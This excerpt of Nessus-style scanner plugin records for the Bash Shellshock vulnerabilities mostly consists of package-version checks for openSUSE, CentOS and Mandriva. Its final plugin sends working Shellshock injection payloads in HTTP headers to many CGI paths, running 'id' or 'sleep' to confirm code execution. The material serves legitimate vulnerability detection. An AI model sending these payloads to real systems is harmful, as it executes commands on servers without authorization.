bash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00052.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:42", "description": "Updated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : bash (CESA-2014:1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bash", "p-cpe:/a:centos:centos:bash-doc", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1306 and \n# CentOS Errata and Security Advisory 2014:1306 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77879);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : bash (CESA-2014:1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. For more information see the Knowledgebase\narticle at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020593.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e6f3298\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7dcec836\");\n # http://lists.centos.org/pipermail/centos-announce/2014-September/020651.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d96a66d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/CentOS/release\");\nif (! version) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (ereg(string:version, pattern:\"release 5\\.([0-9]([^0-9]|$)|10([^0-9]|$))\", icase: 1))\n{\n #CentOS release 5.0-5.10\n if (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5_10.4\")) flag++;\n}\nelse \n{\n #CentOS release 5.11\n if (rpm_check(release:\"CentOS-5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n}\n\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:36", "description": "It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\nAdditionally bash has been updated from patch level 37 to 48 using the upstream patches at ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/ which resolves various bugs.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : bash (MDVSA-2014:190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:bash", "p-cpe:/a:mandriva:linux:bash-doc", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-190.NASL", "href": "https://www.tenable.com/plugins/nessus/77950", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:190. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77950);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137);\n script_xref(name:\"MDVSA\", value:\"2014:190\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mandriva Linux Security Advisory : bash (MDVSA-2014:190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue\n(CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\nAdditionally bash has been updated from patch level 37 to 48 using the\nupstream patches at ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/ which\nresolves various bugs.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"bash-4.2-48.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"bash-doc-4.2-48.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-06T15:41:13", "description": "The remote web server is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {}, "published": "2015-04-06T00:00:00", "type": "nessus", "title": "GNU Bash Incomplete Fix Remote Code Injection (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_6278.NASL", "href": "https://www.tenable.com/plugins/nessus/82581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82581);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"GNU Bash Incomplete Fix Remote Code Injection (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for\nCVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6278\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_timeout(480);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Do not use get_http_port() here\nport = get_kb_item(\"Services/www\");\nif (!port) port = 80;\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n# Do not test broken web servers\nbroken_web = get_kb_item(\"Services/www/\" + port + \"/broken\");\n\n# Do not test CIM servers as HTTP GET requests can lead to FP situations\nif (port == get_kb_item(\"Services/cim_listener\") || broken_web)\n exit(0, 'The web server on port ' +port+ ' is broken.');\n\ncgis = make_list('/');\n\ncgis1 = get_kb_list('www/'+port+'/cgi');\nif (!isnull(cgis1)) cgis = make_list(cgis, cgis1);\n\ncgidirs = get_kb_list('www/'+port+'/content/extensions/*');\nif (!isnull(cgidirs) && !thorough_tests)\n{\n foreach dir (cgidirs)\n {\n if (preg(pattern:'^/+cgi-bin', string:dir, icase:TRUE))\n cgis = make_list(dir, cgis);\n }\n}\n\n# Add common cgi scripts\ncgis = list_uniq(make_list(cgis,\n \"/_mt/mt.cgi\",\n \"/admin.cgi\",\n \"/administrator.cgi\",\n \"/buglist.cgi\",\n \"/cgi/mid.cgi\",\n \"/cgi-bin/admin\",\n \"/cgi-bin/admin.cgi\",\n \"/cgi-bin/admin.pl\",\n \"/cgi-bin/administrator\",\n \"/cgi-bin/administrator.cgi\",\n \"/cgi-bin/agorn.cgi\",\n \"/cgi-bin/bugreport.cgi\",\n \"/cgi-bin/cart.cgi\",\n \"/cgi-bin/clwarn.cgi\",\n \"/cgi-bin/count.cgi\",\n \"/cgi-bin/Count.cgi\",\n \"/cgi-bin/faqmanager.cgi\",\n \"/cgi-bin/FormHandler.cgi\",\n \"/cgi-bin/FormMail.cgi\",\n \"/cgi-bin/guestbook.cgi\",\n \"/cgi-bin/help.cgi\",\n \"/cgi-bin/hi\",\n \"/cgi-bin/index.cgi\",\n \"/cgi-bin/index.pl\",\n \"/cgi-bin/index.sh\",\n \"/cgi-bin/login\",\n \"/cgi-bin/login.cgi\",\n \"/cgi-bin/mailit.pl\",\n \"/cgi-bin/mt/mt-check.cgi\",\n \"/cgi-bin/mt/mt-load.cgi\",\n \"/cgi-bin/mt-static/mt-check.cgi\",\n \"/cgi-bin/mt-static/mt-load.cgi\",\n \"/cgi-bin/ncbook/book.cgi\",\n \"/cgi-bin/printenv\",\n \"/cgi-bin/printenv.cgi\",\n \"/cgi-bin/quickstore.cgi\",\n \"/cgi-bin/search\",\n \"/cgi-bin/search.cgi\",\n \"/cgi-bin/search/search.cgi\",\n \"/cgi-bin/status\",\n \"/cgi-bin/status.cgi\",\n \"/cgi-bin/test.cgi\",\n \"/cgi-bin/test.sh\",\n \"/cgi-bin/test-cgi\",\n \"/cgi-bin/upload.cgi\",\n \"/cgi-bin/urlcount.cgi\",\n \"/cgi-bin/viewcvs.cgi\",\n \"/cgi-bin/wa\",\n \"/cgi-bin/wa.cgi\",\n \"/cgi-bin/wa.exe\",\n \"/cgi-bin/whois.cgi\",\n \"/cgi-bin-sdb/printenv\",\n \"/cgi-mod/index.cgi\",\n \"/cgi-sys/defaultwebpage.cgi\",\n \"/cgi-sys/entropysearch.cgi\",\n \"/index.cgi\",\n \"/index.pl\",\n \"/index.sh\",\n \"/nph-mr.cgi\",\n \"/query.cgi\",\n \"/session_login.cgi\",\n \"/show_bug.cgi\",\n \"/test\",\n \"/test.cgi\",\n \"/ucsm/isSamInstalled.cgi\",\n \"/whois.cgi\",\n \"/wp-login.php\",\n \"/wwwadmin.cgi\",\n \"/wwwboard.cgi\",\n \"/xampp/cgi.cgi\"));\n\nif (thorough_tests) exts = make_list(\"*\");\nelse exts = make_list(\"cgi\", \"php\", \"php5\", \"pl\", \"py\", \"rb\", \"sh\", \"java\", \"jsp\", \"action\", \"do\", \"shtml\");\n\nforeach ext (exts)\n{\n cgis2 = get_kb_list('www/'+port+'/content/extensions/'+ext);\n if (!isnull(cgis2)) cgis = list_uniq(make_list(cgis2, cgis));\n}\n\nif ( thorough_tests )\n headers = make_list('User-Agent', 'Referrer', 'Cookie');\nelse\n headers = make_list('User-Agent');\n\nscript = SCRIPT_NAME - \".nasl\";\nint1 = rand() % 100;\nint2 = rand() % 100;\n\n\n\nEXPLOIT_TYPE_WAIT = 0;\nEXPLOIT_TYPE_STDOUT = 1;\n\n\nexploits = make_list();\nn = 0;\n\nexploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_STDOUT,\n\t\"payload\", '() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo \"' + script+' Output : $((' + int1 + '+'+int2+'))\"; }',\n \t\"pattern\", script + \" Output : \" + int(int1 + int2),\n\t\"followup\", \"() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id; }\"\n\t);\nif (report_paranoia == 2)\n{\n exploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_WAIT,\n\t\"payload\", '() { _; } >_[$($())] { echo; /bin/sleep $WAITTIME; }'\n\t);\n}\n\n\nvuln = FALSE;\nWaitTime = 5;\n\nforeach cgi (cgis)\n{\nforeach exploit ( exploits )\n{\n foreach header (headers)\n {\n then = unixtime();\n\n if ( exploit[\"type\"] == EXPLOIT_TYPE_WAIT && report_paranoia == 2 )\n {\n http_set_read_timeout(WaitTime * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime), string:exploit[\"payload\"]);\n }\n else payload = exploit[\"payload\"];\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, payload),\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n # Check that we added our two random numbers and get our expected output\n # ie : int1 = 40, int2 = 65 output should be the following :\n # bash_cve_2014_6271_rce Output : 105\n if (exploit[\"type\"] == EXPLOIT_TYPE_STDOUT && exploit[\"pattern\"] >< res[2])\n {\n vuln = TRUE;\n attack_req = http_last_sent_request();\n\n match = 